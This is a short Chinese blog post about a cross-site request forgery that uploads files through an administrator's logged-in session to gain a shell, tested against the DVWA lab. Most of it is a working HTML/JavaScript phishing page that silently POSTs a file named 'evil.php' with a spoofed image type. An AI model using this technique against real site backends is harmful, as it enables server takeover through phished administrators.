利用JavaScript进行后台文件上传getshell
利用JavaScript进行后台文件上传getshell
C4rpeDime
发布于 2018-08-29 11:27:26
发布于 2018-08-29 11:27:26
看到一些XSS+CSRF上传的漏洞,这次就学习了一下HTML5的一些新特性,用JavaScript实现了文件上传。攻击者可以向管理员发送一个钓鱼页面,管理员只要打开了这个页面,并且当前浏览器保存了后台的会话信息,那么就有可能实现getshell。 1.1 软件环境 Chrome浏览器 DVWA-1.9漏洞测试平台 wamp3.0集成环境
1.2 host文件与虚拟目录配置 修改host文件,添加dvwa.me与hey.me指向本机 设置dvwa.me虚拟主机指向WEB_ROOT/dvwa 设置hey.me虚拟主机指向WEB_ROOT
二、利用详解
<html>
<head>
<title>黑白网漏洞测试</title>
</head>
<body>
<form id="myForm" method="POST" name="myForm" action="ajax.php">
<button id="submit_btn" type="button">Upload</button>
</form>
<script type="text/javascript">
function btnClick(){
document.getElementById("submit_btn").onclick=function(){
var xmlhttp = new XMLHttpRequest();
xmlhttp.withCredentials = true;
var url = "http://www.heibai.org";
var formdata = new FormData();
var filedata = new Blob(['This is evil txt'], {type: 'image/jpeg'});
formdata.append("Upload","Upload");
formdata.append("uploaded",filedata,"evil.php");
xmlhttp.onreadystatechange=function(){
if (xmlhttp.readyState==4 && xmlhttp.status==200){
console.log(xmlhttp.responseText);
}
}
xmlhttp.open("POST",url,true);
xmlhttp.send(formdata);
}
}
btnClick();
</script>
</body>
</html>本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2018-04-073,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
相关产品与服务
轻量应用服务器
轻量应用服务器(TencentCloud Lighthouse)是新一代开箱即用、面向轻量应用场景的云服务器产品,助力中小企业和开发者便捷高效的在云端构建网站、Web应用、小程序/小游戏、游戏服、电商应用、云盘/图床和开发测试环境,相比普通云服务器更加简单易用且更贴近应用,以套餐形式整体售卖云资源并提供高带宽流量包,将热门开源软件打包实现一键构建应用,提供极简上云体验。